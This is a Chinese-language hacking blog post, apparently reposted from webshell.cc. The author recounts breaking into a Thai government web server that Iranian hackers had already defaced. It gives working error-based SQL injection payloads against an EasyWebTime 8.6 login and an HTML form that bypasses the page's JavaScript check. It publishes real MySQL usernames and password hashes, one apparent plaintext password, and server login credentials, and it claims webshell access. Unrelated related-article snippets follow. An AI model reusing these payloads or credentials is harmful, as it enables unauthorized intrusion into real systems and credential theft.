看了一个泰国政府的网站被伊朗的黑客挂页,上面写着
“Your Box 0wn3z By Behrooz_Ice – Q7x -Sha2ow -Virangar -Ali_Eagle -iman_taktaz – Satanic2000”
“We Love Iran”
“Ashiyane Digital Security Team”
这样的话云云。一些中国的傻逼还拿着别人的黑页去zone-h去提交,感觉受不了这么傻逼的事情,就跟着犯了傻逼,捅了人家的PP
下面我就讲讲怎么捅了他们的PP(http://203.154.183.18/ash_hack.htm)
作者:YoCo Smart
来自:Silic Group Hacker Army

http://blackbap.org

网站服务器ip为:203.154.183.18上面一共有大约一百多个xx.cad.go.th(泰国政府域名后缀)的网站
包括主域名:www.cad.go.th(www.cad.go.th/webadmin/)
我先是看了看上面站的构架,基本上都是一个模板出来的,似乎有点脚本问题,不过不从这边下手。直接访问ip可以看到一个管理后台

看了看这个后台,上面写着EasyWebTime 8.6,不知道是什么东西。然后我就用
用户名:admin’or 1=1# 密码任意123456登陆,得到如下回显:

INSERT INTO log_user (log_date , log_time , log_mid , log_user , log_date_text , log_ip , log_module , log_module_detail , log_detail ) VALUES (’2011-11-19′, ’10:39:41′, ”, ‘admin’or 1=1#’, ’19/11/2011 10:39:41′, ’24.77.19.26′, ‘login’, ‘login’, ‘เข้าสู่ระบบ’)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” at line 1

关键的地方不是这个INSERT INTO这个错误,关键是

  1. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” at line 1

复制代码

这个地方,说明后台有POST注入,而且有数据库错误回显。
这样的话,构建一个SQL注入的POST语句即可,通过错误回显来注入出想要的信息。

错误回显注入很简单,套公式就行了
用户名填写:

  1. admin’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select user() limit 0,1))a from information_schema.tables group by a)b#

复制代码

密码任意,点击登陆,提示用户名错误

 

估计是Javascript在作怪,绕过这个很简单,考虑到后面注入的简便性,干脆写了一个html文档:

  1. <form name=”form1″ method=”post” action=”http://203.154.183.18/login.php”>
  2. <textarea rows=”5″ style=”font-family:Times New Roman;font-size:14pt;” cols=”80″ name=”EWT_User”>admin’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select user() from mysql.user limit 0,1))a from information_schema.tables group by a)b#</textarea>
  3. <input name=”EWT_Password” type=”password” id=”EWT_Password” size=”22″ value=”xxxx” />
  4. <input name=”Submit” type=”submit” value=”Login” />
  5. <input name=”Flag” type=”hidden” id=”Flag” value=”Login” />
  6. <input name=”password_hidden” type=”password” style=”display:none” value=”Welcome” size=”10″ />
  7. <input name=”password_hidden” type=”password” style=”display:none” value=”Welcome” size=”10″ />
  8. <input name=”password_hidden” type=”password” style=”display:none” value=”Welcome” size=”10″ />
  9. </form>

复制代码

其实很简单,line 1里面的method表示提交方法为POST,后面的action为提交到的地址,这是从登陆页面上面直接扒下来的,但是action这个地址是完整的url地址。再往后面的就比较简单看了,保存为xx.html然后访问,在第一个文本框中输入注入语句即可。
注入语句是这样的:

  1. admin’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select user() from mysql.user limit 0,1))a from information_schema.tables group by a)b#

复制代码

于是得到了回显如下:

SELECT * FROM user_info WHERE EWT_User = ‘admin’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select user() from mysql.user limit 0,1))a from information_schema.tables group by a)b#’ AND EWT_Pass = ‘ea416ed0759d46a8de58f63a59077499′ AND EWT_Status = ‘Y’
Duplicate entry ’1bizpoten@203.154.183.18′ for key 1

后面的Duplicate entry ’1bizpoten@203.154.183.18′ for key 1就是想要的注入结果(去掉前面的固定数字’1′)
注入语句中的

  1. select user() from mysql.user limit 0,1

复制代码

换成想要的注入语句即可,例如:

  1. select user from mysql.user where host=’%’ limit 0,1

复制代码

因为每次注入得到的信息只有一条,所以比较吃力
但是最后我注入总结的信息如下:
mysql账户:
用户名: 密码哈希
kk *8B9BA157688A49AFBE7513677DCD4F7C43257018 %
bizpoten *7F6E575FAD18674CADD3B8495C79FBA5B58090D1//!2QwAsZx %
webboard *51E610BE77CF0F81D2861AF180B496D1CA2A7637 localhost
root 密码空 127.0.0.1
数据库中得数据表段:

  1. admin’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select table_name from information_schema.tables where table_schema=database() limit 0,1))a from information_schema.tables group by a)b#

复制代码

大概有70多个,中间跳着过去的,没把表全列出来,具体我忘了,最后面的user_info引起了我的注意:
amphur,article_list,block,block_text,blog_category,blog_comment,org_type,user_info
最后得到服务器的203.154.183.18的登录名和密码为:template/template
取到webshell也就不难了
当然,服务器是windows,装了卡巴斯基,国内的360根本就不是和卡巴斯基一个档次的,提权颇费周折。。。不过。。。菊花聊天室已经挂上了

http://www.cad.go.th/webadmin/

本站内容均为原创,转载请务必保留署名与链接!
捅伊朗黑客PP — 后台登陆POST+错误回显 注入:http://www.webshell.cc/2392.html

捅伊朗黑客PP — 后台登陆POST+错误回显 注入的更多相关文章

  1. bootstrap fileinput控件 + django后台上传、回显简单使用

    一.控件下载:https://github.com/kartik-v/bootstrap-fileinput/ 官网:http://plugins.krajee.com/file-input 需要引入 ...

  2. checkbox选择根据后台List数据进行回显

    需求:记住用户已经选择的 checkbox 选项,当用户再次对该 checkbox 进行选择操作时,应对该用户已经选择的 checkbox 选项进行选中操作. 示例代码: checkbox,js遍历后 ...

  3. jquery接收后台数组或集合回显复选框

    公司使用的框架比较旧,没有使用el等表达式.如果后台传递的是数组,需要把数组转为以逗号分隔的字符串. <% String context = request.getContextPath(); ...

  4. struts的错误回显

  5. 十二 INPUT逻辑视图的配置,回显错误信息

    Action接口中提供了五个逻辑视图的名称 SUCCESS ERROR LOGIN INPUT:input在某些拦截器会使用 NONE 配置逻辑视图:struts_demo2.xml,配置后出现错误信 ...

  6. ecstore 后台登陆跳转到 api失败,中心请求网店API失败

    解决过程没有具体参与,官方解决后回复的邮件,可以参考一下: 后台登陆错误图:   商派解决方法邮件:   特别注意:这个错误提示有时候也跟ecstore的nginx服务器伪静态有关,具体参考: htt ...

  7. dede后台登陆后一片空白的解决办法汇总

    dede后台登陆后一片空白的第一种解决办法: 找到:include/common.inc.php文件,打开,查找程序代码://error_reporting(E_ALL);error_reportin ...

  8. 为wordpress后台登陆添加算术验证码

    对于新建站(个人博客-柠檬https://ninmong.com)的站长来说提高后台的安全性,是一件非常重要的事,添加验证可以起到很好的效果,废话少说,贴代码 //后台登陆数学验证码 function ...

  9. [nodejs] nodejs开发个人博客(七)后台登陆

    定义后台路径 访问这个路径进入后台页面 http://localhost:8888/admin/login 在后台路由控制器里面(/admin/index.js)调用登陆控制器(/admin/logi ...

随机推荐

  1. 【js】js截取字符串 +转化字符串为数字

    js有两种方法可以截取字符串 substr(start , length ])和substring(start, end) parseInt('123') : 返回 123

  2. oracle 性能优化建议

    原则一:注意WHERE子句中的连接顺序: ORACLE采用自下而上的顺序解析WHERE子句,根据这个原理,表之间的连接必须写在其他WHERE条件之前, 那些可以过滤掉最大数量记录的条件必须写在WHER ...

  3. pca主成份分析方法

    1.应用pca的前提 应用pca的前提是,连续信号具有相关性.相关性是什么,是冗余.就是要利用pca去除冗余. 2.pca的定义 pca是一种去除随机变量间相关性的线性变换.是一种常用的多元数据分析方 ...

  4. Unity3d通用工具类之定时触发器

    时隔多日,好不容易挤出点时间来写写博文.不容易,请送我几朵红花,点个赞也行. 今天呢,我们主要来扩展下通用工具类==>定时触发器. 顾名思义,所谓的定时触发器,就是告诉程序在过多长时间后,我要执 ...

  5. 十四.spring-boot使用mybatis

    在springMVC+spring中使用mybatis已经非常非常的灵活,但是需要配置很多的信息 一.创建maven web project 二.创建数据库表 三.在application.prope ...

  6. oe7升级到oe8中import的使用

     oe 7.0到oe 8.0 切换的时候发现我们系统的很多的module 无法load , import的时候出错, 后来发现oe 8.0自己的addons 也都做了修改在import自己的addon ...

  7. Linux驱动mmap内存映射

    mmap在linux哪里? 什么是mmap? 上图说了,mmap是操作这些设备的一种方法,所谓操作设备,比如IO端口(点亮一个LED).LCD控制器.磁盘控制器,实际上就是往设备的物理地址读写数据. ...

  8. jQuery-实现全选与反选

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...

  9. (转)Android技术积累:图片缓存管理

    如果每次加载同一张图片都要从网络获取,那代价实在太大了.所以同一张图片只要从网络获取一次就够了,然后在本地缓存起来,之后加载同一张图片时就从缓存中加载就可以了.从内存缓存读取图片是最快的,但是因为内存 ...

  10. springMVC配置静态资源访问的<mvc:resources>标签的使用

    在springmvc中,为了引用资源的访问不会类似Controller一样被拦截,区分出关注的资源的访问,一般我们在springMVC里面的拦截都会配置为"/",拦截所有的.但是这 ...